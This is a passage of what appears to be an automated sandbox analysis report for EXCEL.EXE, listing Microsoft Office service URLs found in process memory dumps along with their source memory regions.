      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comMBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comt
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://directory.services.
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1AuthorizationBearer
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1&
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1r
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1?
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1EnrichmentWACUrlhttps://enrichment.osi.
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/EnrichmentMetadataUrlhttps://enrichm
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtmlEnrichmentDisambiguat
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtmlXcI
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/ba
      Source: EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/https://login.windows.net/common/oauth2/authorizeMBI_SSLhttps://os
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/ia
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/int
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/om
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://entitlement.diagnosticssdf.office.com1
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechjb
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934222214.000000000DFD0000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidUserVoiceOf
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/Kk
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/https://graph.ppe.windows.net
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://graph.windows.net
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://graph.windows.net/
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/ent7
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/https://graph.windows.net
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.comD
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934265300.000000000DFF9000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: EXCEL.EXE, 00000000.00000003.652896727.000000000E35C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661357019.000000000E35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660061088.000000000E35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655623912.000000000E35B000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetryOfficeOnlineContenthttps://insertmedia.
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: EXCEL.EXE, 00000000.00000002.934621206.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654254896.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661747538.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660265666.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652940500.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655880436.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652838684.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.851830559.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778410177.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742911449.000000000E20D000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: EXCEL.EXE, 00000000.00000002.934222214.000000000DFD0000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1p
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1rev=
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: EXCEL.EXE, 00000000.00000003.652896727.000000000E35C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655623912.000000000E35B000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?OfficeOnlineContentM365Iconshttps://hu
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://incidents.diagnostics.office.com
